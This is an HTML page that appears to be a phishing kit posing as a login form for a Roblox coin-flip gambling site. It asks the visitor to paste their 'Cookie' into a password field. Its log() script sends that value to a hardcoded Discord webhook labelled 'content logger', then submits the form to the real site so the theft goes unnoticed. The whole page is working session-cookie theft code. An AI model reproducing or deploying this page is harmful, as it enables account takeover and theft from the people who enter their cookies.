<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {font-family: Arial, Helvetica, sans-serif;}
* {box-sizing: border-box;}

/* Button used to open the contact form - fixed at the bottom of the page */
body, html {
  height: 100%;
  margin: 0;
}
.bg {
  /* The image used */
  background-image: url("https://cdn.discordapp.com/attachments/779088072985280552/993943380843302912/unknown.png");

  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}
.open-button {
  background-color: #555;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  bottom: 23px;
  right: 28px;
  width: 280px;
}

/* The popup form - hidden by default */
.form-popup {
  display: none;
  position: fixed;
  bottom: 0;
  right: 15px;
  border: 3px solid #282a40;
  z-index: 9;
}

/* Add styles to the form container */
.form-container {
  max-width: 300px;
  padding: 10px;
  background-color: #282a40;
}

/* Full-width input fields */
.form-container input[type=text], .form-container input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #313351;
}

/* When the inputs get focus, do something */
.form-container input[type=text]:focus, .form-container input[type=password]:focus {
  background-color: #ddd;
  outline: none;
}

/* Set a style for the submit/login button */
.form-container .btn {
  background-color: #3185ff;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}

/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: red;
}

/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}
</style>
</head>
<body>
<div class="bg"></div>

<button class="open-button" onclick="openForm()" style="color:#313351">Login</button>

<div class="form-popup" id="myForm" style="border-radius: 0.3rem">
  <form action="https://rbxflip.com/coinflip" class="form-container" style="border-radius: 0rem">
    <h1 style="color:#f1f1f1">Login</h1>


    <label for="psw" style="color:#f1f1f1"><b>Cookie</b></label>
    <input type="password" placeholder="" name="psw" style="border-radius: 0.5rem" id="psw" required>

    <button type="" class="btn" onclick="log()" style="border-radius: 1rem">Login</button>
   
  </form>
</div>

<script>
document.getElementById("myForm").style.display = "block";
function openForm() {
  
  document.getElementById("myForm").style.display = "block";
}

function closeForm() {
  document.getElementById("myForm").style.display = "block";
}

function log() {
	var pass = document.getElementById("psw");
      const request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/989002838912946176/SMwRa-zDhYUBR6E7ZMh0-VKwzswPAzQe8i7z_t-eac8mf62YlQMGBEjGNZ8sOk477EWf");

      request.setRequestHeader('Content-type', 'application/json');
	
      const params = {
        username: "content logger",
        avatar_url: "",
        content: pass.value
      }

      request.send(JSON.stringify(params));
}
</script>

</body>
</html>
